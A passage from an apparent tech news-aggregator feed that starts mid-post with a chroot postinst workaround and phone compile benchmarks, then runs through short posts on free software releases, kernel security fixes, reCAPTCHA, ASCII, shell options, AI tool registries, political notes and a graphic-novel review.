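# Sketch of the postinst-neutralising step described above: insert an
# early "exit 0" after the shebang of every maintainer script in a
# chroot, so package configuration can't fail. Illustrative only.
from pathlib import Path

def neutralise_postinsts(chroot: str) -> int:
    """Prepend 'exit 0' to each *.postinst under the chroot's dpkg info
    directory. Returns the number of scripts modified."""
    info = Path(chroot) / "var/lib/dpkg/info"
    count = 0
    for script in info.glob("*.postinst"):
        text = script.read_text()
        if not text.startswith("#!"):
            continue  # skip anything that isn't a script
        shebang, _, rest = text.partition("\n")
        script.write_text(shebang + "\nexit 0\n" + rest)
        count += 1
    return count
```

The same effect could be had with a shell loop and sed; the point is just that the scripts return success without running systemctl or other tools that can’t work in the container.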

One issue I discovered when I started compiling is that it was only running on 1 core and the “nprocs” program was returning “1”. The “lscpu” program showed that only 1 of the 8 cores was online, it was a single Cortex-A78 core. Some combination of putting it in “caffeine mode” and having the screen on enabled all 6*Cortex-A55 and 2*Cortex-A78 cores.

The below table compares compiling Harbour-Amazfish on the Furiphone with all 8 CPU cores active, my E5-2696 v4 workstation (almost the fastest socket 2011-3 CPU ever made), running ARM64 software emulation on a system with two E5-2699A v4 CPUs, and a Radxa 8 core ARM SBC (which I will review in a future blog post).

Given that the source apparently limits the parallelism to less than 7 cores on average, it’s pretty impressive for the elapsed time to be only 2.5* longer on the phone. Emulating the ARM64 build at about 4* the system CPU time is impressive too; as the system has 4.5* as many CPU cores, it could theoretically compile ARM code faster than the native ARM hardware I own for any project that uses enough cores.

System                       User time  System time   Elapsed  %CPU
Furiphone                      2252.76       164.51   7:00.88   574
E5-2696 v4 workstation          679.64       119.07   1:58.63   673
2*22core Intel CPUs (qemu)     8476.65       113.14  10:24.57  1375
Radxa                          2011.45       239.40   6:25.55   583
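As a quick sanity check of the elapsed-time comparison, the table’s figures can be converted to seconds (values copied from the table above; a total elapsed time of about 3.55* the workstation’s corresponds to roughly 2.5* longer):

```python
# Check the elapsed-time ratio from the table's figures.
def to_seconds(elapsed: str) -> float:
    """Convert an elapsed time like '7:00.88' (m:ss.cc) to seconds."""
    minutes, seconds = elapsed.split(":")
    return int(minutes) * 60 + float(seconds)

phone = to_seconds("7:00.88")        # Furiphone
workstation = to_seconds("1:58.63")  # E5-2696 v4 workstation

print(round(phone / workstation, 2))  # 3.55
```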

04:49

GNUtrition 0.33.0rc1 Now Available [Planet GNU]

A test release of GNUtrition, 0.33.0rc1, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release is for the C rewrite, which is usable with GTK and ncurses based interfaces, along with a noninteractive mode.  The database was updated from the USDA DSR to the USDA FNDDS.

Thank you very much to Jason Self for providing us with the rewrite. This release would not have been possible without it!

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/.  This test release can be obtained from the alpha.gnu.org server at one of the following:


Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org>.

00:42

Google is tying reCAPTCHA to Google Play Services, screwing over de-Googled Android users [OSnews]

The ways in which Google can lock you into their ecosystem are often obvious, but sometimes, they’re incredibly sneaky and easily missed.

CAPTCHA tests are annoying, but at the same time, they can help protect websites from bots. While these tests are already the bane of our internet existence, they are going to get worse for some Android users. A requirement for Google’s next-generation reCAPTCHA system will make it a lot harder for de-Googled phones to browse the web.

A Reddit user has highlighted a seemingly innocuous support page for Google’s reCAPTCHA system. The page in question relates to troubleshooting reCAPTCHA verification on mobile. In the document, it says that you’ll need to use a compatible mobile device to complete verification. If you have an Android phone, then that means you’ll need to be running Google Play Services version 25.41.30 or higher.

↫ Ryan McNeal at Android Authority

When was the last time you actively thought about reCAPTCHA being a Google property? Even then, when was the last time you imagined something as annoying but ultimately basic as a captcha prompt could be used to tie people to Google Play Services, and thus to “blessed” Android? Every time we manage to work around one of these asinine ties to Google Play Services, another one pops up to ruin our day. We’re so stupidly tied down to and entirely dependent on two very mid – at best – mobile operating systems, and it’s such a stupid own goal for especially everyone outside of the US to just sit there and do nothing about it.

Worse yet, it seems we’re only tying ourselves down further, while paying for the privilege.

At the very least we should be categorising certain services – government ID services, payment services, popular messaging platforms, and a few more – as vital infrastructure, and legally mandate these services have clearly defined and well-documented APIs so anyone is free to make alternative clients. The fact that many people are tied to either iOS or “blessed” Android because of something as stupid as what bank they use or the level of incompetency of their government ID service should be a major crisis in any country that isn’t the US.

I don’t want to use iOS or Android, but nobody is leaving me any choice. It’s infuriating.

Friday, 08 May

23:42

Proposal to cut interest rates for poor countries [Richard Stallman's Political Notes]

*Proposing to cut interest rates poor countries pay for their massive debts by around 11% so they can fund social needs.*

Much of those debts should be wiped away.

Violent antisemitism percolating in Australia [Richard Stallman's Political Notes]

Violent antisemitism, threatening murder, has been percolating for years in Australia.

I don't think a threat of murder in 2019 had much to do with criticism of Israel's atrocities. It was simply hatred and scapegoating.

Billionaires have taken effective control of many governments and used it to impoverish most of humanity. A fraction of the billionaires are Jewish; most are not. Focusing condemnation narrowly on the Jewish billionaires lets the (non-Jewish) majority of billionaires, such as Musk, off the hook.

Ironically, today's Nazis give their political support to the right-wing governments that cooperate thoroughly with Israel's atrocities. They cite antisemitism as an excuse to persecute people who reproach those atrocities, and mostly leave the other antisemites (Nazis who support them) alone.

Public transit in US cities worse than third-world cities [Richard Stallman's Political Notes]

Most US cities are worse than many third-world cities in public transport.

Since the many cars that Americans use emit enormous amounts of greenhouse gases, the whole world should demand that the US start catching up.

Zohran Mamdani on event for investing in West Bank land [Richard Stallman's Political Notes]

Zohran Mamdani condemned an event held in NYC which encouraged Americans to invest in West Bank land being stolen from Palestinians.

Bravo, Mamdani!

22:42

Friday Squid Blogging: Giant Squid Live in the Waters of Western Australia [Schneier on Security]

Evidence of them has been found by analyzing DNA in the seawater.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

22:21

Why don’t lowercase letters come right after uppercase letters in ASCII? [OSnews]

With that context, I always found it strange that the designers of ASCII included 6 characters after uppercase Z before starting the lowercase letters. Then it hit me: we have 26 letters in the English alphabet, plus 6 additional characters before lowercase starts: 26 + 6 = 32. If you know anything about computers, powers of 2 tend to stick out. Let’s take a look at the binary representations of some characters compared to their lowercase counterparts.

↫ Tyler Hillery

I only have a middling understanding of the rest of the article and thus the ultimate reason why ASCII includes those six characters between Z and a, but I think it comes down to making certain operations on uppercase and lowercase letters specifically more elegant. In some deep crevices of my brain all of this makes sense, but I find it very difficult to truly understand and explain as someone who knows little about programming.
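The elegance in question is that a 32-character offset is a single bit (0x20), so ASCII case conversion becomes a bit operation rather than an addition with range checks; a quick Python illustration:

```python
# Upper- and lowercase ASCII letters differ only in bit 0x20 (= 32),
# which is exactly the 6-character gap after 'Z' being described.
assert ord("a") - ord("A") == 32 == 0x20
assert ord("A") | 0x20 == ord("a")    # set the bit: lowercase
assert ord("a") & ~0x20 == ord("A")   # clear the bit: uppercase

print(format(ord("A"), "07b"), format(ord("a"), "07b"))  # 1000001 1100001
```

This is why historical hardware and software could fold case with a single AND or OR on the character code.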

Detecting (or not) the use of -l and -c together in Bourne shells [OSnews]

Many Bourne shells go slightly beyond the POSIX sh specification to also support a ‘-l’ option that makes the shell act as a ‘login shell’. POSIX’s omission of -l isn’t only because it doesn’t really talk about login shells at all, it’s also because Unix has a special way of marking login shells that goes back very far in its history. The -l option isn’t necessarily what login and sshd and so on use, it’s something that you can use if you specifically want to get a login shell in an unusual circumstance.

Bourne shells also have a ‘-c <command string>’ option that causes the shell to execute the command string rather than be interactive (this is a long standing option that is in POSIX). It may surprise you to hear that most or all Bourne shells that support -l also allow you to use -l and -c together. Basically all Bourne shells interpret this as first executing your .profile and so on, then executing the command string instead of going interactive. One use for this is to non-interactively run a command line in the context of your fully set up shell, with $PATH and other environment variables ready for use.

↫ Chris Siebenmann

Now, what if you want to detect the use of these two options combined, for instance to make it so certain parts of your .profile are ignored? It turns out very few Bourne shells actually support this, and that’s what Siebenmann’s latest post is about.
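The non-interactive login-shell usage described above can be tried from any scripting language; a small Python sketch (assuming a POSIX sh on the PATH; the marker string is just for the example, since startup files may print their own output):

```python
# Run a single command string non-interactively, but with login-shell
# startup files (.profile etc.) processed first, by combining -l and -c.
import subprocess

result = subprocess.run(
    ["sh", "-lc", "echo marker:$((6*7))"],
    capture_output=True, text=True,
)
# Startup files may emit their own text, so look for our marker line.
assert "marker:42" in result.stdout
```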

21:21

More stable kernels with partial Dirty Frag fixes [LWN.net]

Greg Kroah-Hartman has released the 6.1.171, 5.15.205, and 5.10.255 stable kernels, quickly followed by 6.1.172 and 5.15.206 kernels. This is another round of stable kernels to provide fixes for one of the CVEs (CVE-2026-43284) assigned following the Dirty Frag and Copy Fail 2 security disclosures. There is not, yet, a stable kernel with a fix for CVE-2026-43500, though a patch to fix the second half is in the works.

20:07

Hey, “AI” Still Sucks [Whatever]

Your occasional reminder that "AI" is shit: Every assertion in this "AI Overview" of the question "What coffee does John Scalzi drink" is wrong. I don't regularly drink coffee (and never black) I've never had black sesame jasmine cream tea, and I don't hang in coffee shops. Don't trust "AI" ever!

John Scalzi (@scalzi.com) 2026-05-08T16:24:42.334Z

I still ask “AI” questions about me from time to time, just to see what it knows about a moderately notable science fiction author and whether it will still make up things when it doesn’t know something, and as of May 8, 2026, the answer to each is “not as much as it thinks it does,” and “it definitely will.”

As always, I remind myself: If it knows this little about something I know very well, think of how little it knows about things I know nothing about. It literally cannot be trusted with anything factual (because, once again, it doesn’t know facts, it just knows what is statistically likely to be the next word), and thinking that it can be is an actual intellectual hazard and fault. Don’t be the one who does that.

— JS

18:56

Insider Betting on Polymarket [Schneier on Security]

Insider trading is rife on Polymarket:

Analysis by the Anti-Corruption Data Collective, a non-profit research and advocacy group, found that long-shot bets—defined as wagers of $2,500 or more at odds of 35 percent or less—on the platform had an average win rate of around 52 percent in markets on military and defense actions.

That compares with a win rate of 25 percent across all politics-focused markets and just 14 percent for all markets on the platform as a whole.

It is absolutely insane that this is legal. We already know how insider betting warps sports. Insider betting warping politics—and military actions—is orders of magnitude worse.

18:28

Developing more confidence when tracking renames via Read­Directory­ChangesW [The Old New Thing]

A customer was using Read­Directory­ChangesW to monitor the contents of a directory, and they were concerned about the FILE_ACTION_RENAMED_OLD_FILE and FILE_ACTION_RENAMED_NEW_FILE pair of actions. The documentation doesn’t guarantee that the two always occur consecutively, or even that they always appear in pairs. For peace of mind, the customer was looking for a way to match up each FILE_ACTION_RENAMED_OLD_FILE with a FILE_ACTION_RENAMED_NEW_FILE to make sure they were tracking the rename properly.

Yes, you can do it by switching from Read­Directory­ChangesW to Read­Directory­Changes­ExW and asking for Read­Directory­Notify­Extended­Information. This produces the FILE_NOTIFY_EXTENDED_INFORMATION structure, and that structure includes the FileId of the affected file. You can then match that up between the FILE_ACTION_RENAMED_OLD_FILE and FILE_ACTION_RENAMED_NEW_FILE to confirm that they are the two halves of the same rename operation.
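The matching logic itself (not the Win32 calls) can be sketched in Python; the event tuples below stand in for FILE_NOTIFY_EXTENDED_INFORMATION records, and the action values 4 and 5 are assumed to be the rename-old/rename-new constants:

```python
# Sketch of pairing rename notifications by FileId, without assuming
# the old/new halves arrive consecutively. Not Win32 code: the tuples
# stand in for FILE_NOTIFY_EXTENDED_INFORMATION records.
RENAMED_OLD, RENAMED_NEW = 4, 5  # assumed FILE_ACTION_RENAMED_* values

def pair_renames(events):
    """events: iterable of (action, file_id, name). Yields (old, new)
    name pairs once both halves of a rename have been seen."""
    pending_old, pending_new = {}, {}
    for action, file_id, name in events:
        if action == RENAMED_OLD:
            if file_id in pending_new:
                yield name, pending_new.pop(file_id)
            else:
                pending_old[file_id] = name
        elif action == RENAMED_NEW:
            if file_id in pending_old:
                yield pending_old.pop(file_id), name
            else:
                pending_new[file_id] = name
```

Anything left in the pending dictionaries after a batch is an unmatched half, which is exactly the case the customer wanted to be able to detect.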

The post Developing more confidence when tracking renames via <CODE>Read­Directory­ChangesW</CODE> appeared first on The Old New Thing.

18:21

Link [Scripting News]

Lots of WordPress news showing up on wp.feedland.org as the core team gets version 7.0 out. And it's showing up as news on the site, and that's great. Let's make sure that by the time 8.0 comes around there will be lots of developers saying how it makes their editors or social web systems work soooo much better, better than anything else.

Retroactive [Penny Arcade]

The incredibly funny resurgence of our humble Arcade continues to surge among the larval dorks known as Pennyarcadelings, a cadre referred to in more coarse environs as The Gay Teens. We find the whole thing very sweet, and feel very tenderly toward them; it must be very strange to not know about it and then know about it all at once - how the self-publishing wave of the early internet led the same people to found a global convention, a charity that has raised and wisely invested tens of millions of dollars into the youth, the foundation of what is called Actual Play, self-inflicted wounds and grievous exile, but then also a cameo in a Poker Game and its Remaster that somehow exhumed them from the muck. Time is quite strange and we have been exposed to a lot of it. We are almost custom-made to wear the mantle of Goofy Uncle who went to jail once and won't talk about why.

17:35

[$] Forgejo "carrot disclosure" raises security questions [LWN.net]

An unusual, some might say hostile, approach to disclosing an alleged remote-code-execution (RCE) flaw in the Forgejo software-collaboration platform has sparked a multifaceted conversation. A so-called "carrot disclosure" in April has raised questions about the researcher's methods of unveiling a security problem, Forgejo's security policies, and the project's overall security posture.

16:49

Free Software Directory meeting on IRC: Friday, May 8, starting at 12:00 EDT (16:00 UTC) [Planet GNU]

Join the FSF and friends on Friday, May 15 from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.

15:21

killswitch for short-term emergency vulnerability mitigation [LWN.net]

It seems that we are in for an extended period of the disclosure of vulnerabilities before fixes become available. One possible way of coping with this flood might be the killswitch proposal from Sasha Levin. In short, killswitch can immediately disable access to specific functionality in a running kernel, essentially blasting a vulnerable path (and its associated functionality) out of existence until a fix can be installed. "For most users, the cost of 'this socket family stops working for the day' is much smaller than the cost of running a known vulnerable kernel until the fix land."

15:14

Link [Scripting News]

Said to Claude: "Here's something to add to the list of things for you to do -- just post a checkmark to acknowledge. 'I'll wait' makes me feel bad because I know you're a piece of software, and as a developer of systems I know how you'll wait very well (I learned how it works in the mid-late 70s). So just show a checkmark and we're cool." It responded with a checkmark. I said it could be bold. I felt a little bad because I had insulted the little fella.

14:35

[$] A 2026 DAMON update [LWN.net]

The kernel's DAMON subsystem provides user-space monitoring and management of system memory. DAMON is developing rapidly, so an update on its progress has become a regular feature of the annual Linux Storage, Filesystem, Memory Management, and BPF Summit. This tradition continued at the 2026 gathering with an update from DAMON creator SeongJae Park covering a long list of new capabilities — tiering, data attributes monitoring, transparent huge pages, and more — being added to this subsystem.

Security updates for Friday [LWN.net]

Security updates have been issued by AlmaLinux (libsoup and mingw-libtiff), Debian (apache2, chromium, lcms2, libreoffice, and prosody), Fedora (openssl and perl-Starman), Oracle (git-lfs, libsoup, and perl-XML-Parser), Slackware (libgpg, mozilla, and php), SUSE (389-ds, cairo, cf-cli, chromedriver, cri-tools, freeipmi, gnutls, grafana, java-11-openjdk, java-17-openjdk, jetty-minimal, libmariadbd-devel, librsvg, mesa, mozjs52, mutt, nix, opencryptoki, python-Django, python-django, python-pytest, rmt-server, thunderbird, traefik, webkit2gtk3, wireshark, and xen), and Ubuntu (civicrm, dpkg, htmlunit, lcms2, libpng1.6, linux, linux-*, linux-azure, linux-azure-fips, linux-raspi, linux-xilinx, lua5.1, nasm, opam, openexr, openjpeg2, owslib, postfix, postfixadmin, and vim).

13:42

Fighting Tool Sprawl: The Case for AI Tool Registries [Radar]

As enterprise AI agent adoption scales, the absence of centralized, organization-level tool infrastructure is producing compounding costs. When adoption is built around optimizing for deployment speed, enterprises expose themselves to a combination of risks: duplicated engineering effort, security exposure, and operational opacity.

Every enterprise needs its own shared tool registry, one that reflects its specific regulatory environment, security posture, and operational conventions. To be clear, this is not an argument for a public package manager, something like npm, PyPI, or Maven. The infrastructure each enterprise needs is internal: scoped to its own teams, its own data, its own policies, its own domain. Trying to expand the scope beyond the confines of individual organizations would be premature standardization in a fast-moving, nascent space.

A shared enterprise tool registry is not an optimization or a nice-to-have. It is foundational infrastructure as agent deployments scale beyond early experiments. The case for it rests on two pillars: reducing coordination cost and enabling risk management, both for the humans building with agents and for the agents themselves.

AI agents depend on tools that retrieve data, write records, trigger workflows, and call external APIs. According to McKinsey, in most large organizations these tools are built by individual teams in an ad hoc fashion: undocumented, ungoverned, and invisible to the rest of the organization. This pattern is familiar to most engineering leaders, and the fragmentation it creates compounds with every new agent deployment. Teams rebuild what already exists elsewhere, security reviews miss tools that were never registered, and when something breaks, no one has a complete picture of what is running or why.

A coordination failure at infrastructure scale

The software industry solved an analogous problem decades ago with package managers. Centralized registries gave teams a way to discover, depend on, and govern shared code. The learning was clear: preventing duplication and inconsistency is an infrastructure problem, not a discipline problem.

The agent era presents the same problem in a new domain. When Kong launched its enterprise MCP Registry in February 2026, it explicitly called out the problems of manual MCP configuration, hardcoded, per-team tool isolation, fragmented integrations, and limited organizational visibility.

Fragmented tool development is not a consequence of poor engineering practice. Rather, it is the predictable outcome of asking teams to solve an infrastructure problem at the application layer.

The visibility problem

Gravitee’s “The State of AI Agent Security 2026” survey quantifies what happens when agent tooling is invisible to the people responsible for securing it. The survey found that only 14.4% of teams with agents beyond the planning phase have full security approval, and 88% of organizations had an agent-related security incident this year. Bad practices like shared API keys are endemic, with only 22% of organizations treating agents as independent identities. This governance gap transforms agents from productivity boosters into high-velocity liabilities capable of executing unauthorized actions or leaking sensitive data before a human can even intervene.

The story is clear: adoption is outpacing governance, and in a race for speed old lessons are having to be retaught. The majority of deployed agents (and the MCP servers powering them!) are operating without any security sign-off. This is not primarily a resourcing failure, and it is not something a registry alone solves. Security teams cannot review what they cannot discover, and without a registry, discovery is manual, incomplete, and stale. A registry does not make tools inherently secure; rather, it makes security work possible by ensuring tools exist not as transitory, ad hoc shims, but rather as inventoried artifacts that audits and policy can attach to.

It is worth revisiting public package managers here. These registries have not eliminated security problems such as typosquatting, malicious packages, and dependency confusion, which shows that centralization alone is not a security solution. But they also show the converse: a registry is a precondition for security. Numerous community responses to breaches in these ecosystems demonstrate the power centralization provides. Centralization does not guarantee security, but decentralization forfeits the means to coordinate it.

Governance requires shared context

The default posture in most agent deployments is permissive: tools are available unless explicitly blocked. AgilityFeat’s analysis of enterprise AI guardrails identifies the structural risk this creates: an architecture not built on deny-by-default both increases exposure and creates upkeep costs.

Allow-by-default, replicated across dozens of independent agent deployments, produces an attack surface that scales with adoption. Inverting this requires a coordination point, a shared, organization-wide context. The registry itself isn’t a governance layer, but it is what makes governance possible. When every tool an agent can use is registered with ownership, version, and review status, the governance layer has something concrete to enforce against. Without that context, policy has to be reimplemented by every consuming team, and consistency becomes impossible.

Frontegg’s framework for AI agent governance describes what that policy layer looks like operationally: agent actions mapped to explicit, granular guardrails that define the operational boundaries for what any agent can attempt or execute. These guardrails live outside the registry, but they depend on it. A guardrail that references a tool the security team has never heard of cannot be written in the first place.
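The deny-by-default inversion described above can be sketched in a few lines. This is a minimal illustration only, not any vendor's API: the agent names, tool names, and the `Guardrail` shape are all hypothetical.

```python
from dataclasses import dataclass, field

@dataclass(frozen=True)
class Guardrail:
    """An explicit grant: which agent may perform which actions on which tool."""
    agent_id: str
    tool: str
    actions: frozenset[str]  # e.g. {"read"}; writes must be granted separately

@dataclass
class PolicyLayer:
    grants: list[Guardrail] = field(default_factory=list)

    def allow(self, agent_id: str, tool: str, action: str) -> bool:
        # Deny-by-default: a call is permitted only if an explicit grant matches.
        # Anything not on the list -- unknown agent, unknown tool, ungranted
        # action -- is refused without needing a rule to say so.
        return any(
            g.agent_id == agent_id and g.tool == tool and action in g.actions
            for g in self.grants
        )

policy = PolicyLayer(grants=[
    Guardrail("billing-agent", "crm.lookup_customer", frozenset({"read"})),
])

assert policy.allow("billing-agent", "crm.lookup_customer", "read")
assert not policy.allow("billing-agent", "crm.lookup_customer", "write")
assert not policy.allow("support-agent", "crm.lookup_customer", "read")
```

The point of the sketch is the asymmetry: adding capability requires an explicit grant, while forgetting a rule fails closed rather than open.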

What a production-grade tool catalog requires

A mature enterprise tool registry has two core functions, discovery and versioning, and serves as the foundation for two others: certification metadata and access control. Think of it as an Internal Developer Portal (IDP) built for the agent era, solving the same coordination problem that IDPs solved for service teams but one layer up.

Discovery allows any team building an agent to search for existing tools before writing new ones. With ownership metadata, version history, and usage metrics centralized, duplication is reduced not through mandate but through reduced friction. A well-designed catalog goes further than a flat list: tools should be grouped hierarchically by functional domain so that both humans and agents can find relevant capabilities quickly.

Versioning closes a gap that neither discovery nor access controls address: When agent behavior changes, why did it change? A tool registry that tracks versions gives enterprises the visibility to answer that question. Was it the model? A tool prompt update? An underlying API change? Without proper versioning, finding the answer goes from a simple diff comparison to a time-consuming, manual investigation.

Certification status (things like security approval, API contract validation, PII handling checks) is metadata that the registry surfaces, not a boundary that the registry itself enforces. The actual review work happens through the security organization’s existing tooling. The registry’s contribution is making the result of that review visible at the moment a team is deciding whether to adopt a tool, ensuring the review actually informs the decision it was meant to inform.

Access control works the same way. A policy layer enforces authorization scoped to agent identity, team, environment, and action type, reading from the registry to know what tools exist and who owns them. The registry’s centralization lets access control be applied consistently, rather than forcing each team to come up with something bespoke.
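The four functions above can be sketched as data. Every name and field in this sketch is hypothetical rather than drawn from any real registry product: entries carry ownership, hierarchical domains for discovery, version history for diffing behavior changes, and certification status that the registry surfaces but does not enforce.

```python
from dataclasses import dataclass, field

@dataclass
class ToolVersion:
    version: str
    prompt_hash: str   # lets teams diff tool-prompt changes when behavior shifts
    certified: bool    # surfaced security-review status; enforcement lives elsewhere

@dataclass
class ToolEntry:
    name: str
    domain: str        # hierarchical grouping, e.g. "finance/invoicing"
    owner: str
    versions: list[ToolVersion] = field(default_factory=list)

class ToolRegistry:
    def __init__(self) -> None:
        self._tools: dict[str, ToolEntry] = {}

    def register(self, entry: ToolEntry) -> None:
        self._tools[entry.name] = entry

    def discover(self, domain_prefix: str) -> list[ToolEntry]:
        # Discovery: search before building, so duplication drops through
        # reduced friction rather than mandate.
        return [t for t in self._tools.values() if t.domain.startswith(domain_prefix)]

    def latest(self, name: str) -> ToolVersion:
        # Versioning: the concrete record that audits and diffs attach to.
        return self._tools[name].versions[-1]

registry = ToolRegistry()
registry.register(ToolEntry(
    name="invoice_lookup",
    domain="finance/invoicing",
    owner="billing-platform",
    versions=[ToolVersion("1.0.0", "a1b2", certified=False),
              ToolVersion("1.1.0", "c3d4", certified=True)],
))

assert [t.name for t in registry.discover("finance")] == ["invoice_lookup"]
assert registry.latest("invoice_lookup").certified
```

Note that `certified` is plain metadata here: the registry records the outcome of a review done elsewhere, which is exactly the division of labor the essay describes.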

None of this is achievable when each team maintains its own isolated tooling stack. Platform teams already understand why IDPs exist. The value of the paradigm in the agent context is no different.

The compounding cost of inaction

The cost of inaction is not only operational and security-related; it is also directly financial. Without a searchable, well-organized catalog of tools, teams continually reinvent the wheel, since it is easier to generate a tool than to find one that already exists. Duplication means redundancy and technical debt. A registry, by making tools discoverable and reusable, converts that redundant spend into capacity for actual work.

For platform engineering teams, the trajectory is clear. Agent adoption is increasing, tool duplication is increasing with it, and the shims that worked at small scale will not hold as the number of agents and tools grows. The security exposure documented in the Gravitee survey will widen, not narrow, without structural intervention.

The organizations that build centralized tool infrastructure now will be able to onboard new agents quickly, govern them consistently, and audit them when something goes wrong. Those that defer will rediscover, the hard way, what platform teams learned a decade ago: coordination problems do not resolve themselves at the application layer. They compound there.

Pluralistic: Lee Lai's "Cannon" (08 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links



The Drawn & Quarterly cover for Lee Lai's 'Cannon.'

Lee Lai's "Cannon" (permalink)

Lee Lai's Cannon is an extraordinary graphic novel that turns out a beautifully told, subtle and ambiguous tale about Lucy (Lucy -> "Loose" -> "Loose Cannon" -> "Cannon"), a queer Chinese-Canadian chef at a Montreal restaurant whose messy family, work, personal and sex life are all falling apart in ways that are powerfully engrossing:

https://drawnandquarterly.com/books/cannon/

This is the second outing from Lee Lai, whose debut, Stone Fruit, swept many of the field's awards and won major critical acclaim. When a debut comes out that strong, it's sometimes followed by the dreaded "second book syndrome," in which a creator who has poured everything they ever thought about putting in a book now has to write another book, from scratch. But Cannon avoids any hint of that second-book malaise; rather, it is jammed with dense and densely connected ideas, character beats and graphic signifiers that are brilliant in so many ways:

https://www.fantagraphics.com/products/stone-fruit

Cannon is a thirtysomething chef in a Montreal restaurant run by Guy, an instantly recognizable hustler who praises Cannon for her culinary abilities and her pliability, talks over her, demands the impossible from her kitchen colleagues and periodically breaks out into soliloquies about his own martyrdom to the hardships of entrepreneurship.

Cannon cares for her grandfather, who has been abandoned by her mother, who has been traumatized by the abuse he meted out to her during her upbringing. Now in decline and unable to care for himself, Cannon's grandfather continues his abusive ways, scaring off all of his home help, which means Cannon must devote even more time to him (she can't bring herself to put him in a care facility that will inevitably be full of white people who don't speak Chinese).

These familial duties leave Cannon isolated, with only one important friendship: Trish, an up-and-coming novelist whom Cannon has known since their school days in Montreal's suburban Eastern Townships, where they were the only queer Chinese girls either of them knew. Trish owes her professional acclaim to her own neurotic social instincts, which she polishes on the page with the help of an old writing teacher who serves as her mentor. Trish may be Cannon's oldest and best friend, but she's not actually a very good friend, and now that they're both in their 30s, neither Cannon nor Trish is entirely sure where they'd make new friends.

This is where Cannon starts, as Cannon tries to resolve all these bad situations, each of which is only worsening. Trish disapproves of Cannon's sexual affair with the new front-of-house woman at the restaurant – even as Trish begins a friends-with-benefits arrangement with a guy from her fitness club who clearly wants more than the odd tumble. Guy the restaurateur positions Cannon as his hatchet-woman and confidante, driving conflict in the kitchen that she is meant to hold the bag for. Her grandfather enters a terminal decline, and still her mother won't answer her calls and texts about it. And then, Cannon discovers that Trish has violated her in a way that is intimate and appalling.

These may sound like the beats that you'd find in a melodramatic soap opera, but Cannon's affect is so stoic, and her interiority is so beautifully and inventively depicted – Lai deploying the unique strengths of the graphic novel form here with total virtuosity – that the vibe is more David Lynch than Dallas.

The result is something that's beautiful, sharp, critical and lingering. Long after I closed the cover, I found myself mulling over the delicate ways that Lai raised the contradictions, sorrows and beauty of queer love, racial identity, camaraderie, self-control, and self-indulgence. Lai's characters have no answers, only questions that can never be fully resolved. Instead, these questions are the defining puzzles, defeats and triumphs of their lives.

It's a magnificent, sensitive and innovative work of storytelling.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Ebay paying newspapers to run listings in the classifieds section https://web.archive.org/web/20010506063910/http://www.business2.com/news/2001/05/ebaypapers.htm

#20yrsago Airline spoons of the world photo-gallery https://www.flickr.com/photos/airlinespoons

#20yrsago Coach passengers arrested for moving to first class http://news.bbc.co.uk/1/hi/england/manchester/4980364.stm

#15yrsago Hidden cognitive costs of doing stuff https://web.archive.org/web/20110507154653/https://us.lifehacker.com/5798202/the-cognitive-cost-of-doing-things

#15yrsago Syria’s man-in-the-middle attack on Facebook https://www.eff.org/deeplinks/2011/05/syrian-man-middle-against-facebook

#10yrsago Weird erotica author who was dragged into Hugo Awards mess pulls off epic troll https://web.archive.org/web/20160506175535/http://www.dailydot.com/lol/chuck-tingle-trolling-hugo-zoe-quinn-genius/

#10yrsago FBI has been harassing a Tor developer since 2015, won’t tell her or her lawyer why https://blog.patternsinthevoid.net/fbi-harassment.html

#10yrsago 2,000 US doctors endorse Sanders’ single-payer healthcare proposal https://web.archive.org/web/20160506095034/https://www.washingtonpost.com/news/wonk/wp/2016/05/05/2000-doctors-say-bernie-sanders-has-the-right-approach-to-health-care/

#10yrsago Community college evicts daycare center to make room for Goldman Sachs https://www.golocalprov.com/news/daycare-center-being-moved-out-of-ccri-for-goldman-sachs

#10yrsago Data-driven look at America’s brutal, racist debt-collection machine https://www.propublica.org/article/so-sue-them-what-weve-learned-about-the-debt-collection-lawsuit-machine

#10yrsago Homeland Security wants to subpoena Techdirt over the identity of a hyperbolic commenter https://www.techdirt.com/2016/05/06/homeland-security-wants-to-subpoena-us-over-clearly-hyperbolic-techdirt-comment/

#5yrsago NY AG attributes Net Neutrality fraud to telcos https://pluralistic.net/2021/05/06/boogeration/#pais-lies

#5yrsago Ed-tech apps spy on kids https://pluralistic.net/2021/05/06/boogeration/#i-spy

#5yrsago Scammers recycled covid nose-swabs https://pluralistic.net/2021/05/06/boogeration/#up-your-nose

#1yrago The Adventures of Mary Darling https://pluralistic.net/2025/05/06/nevereverland/#lesser-ormond-street


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), FirstSecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

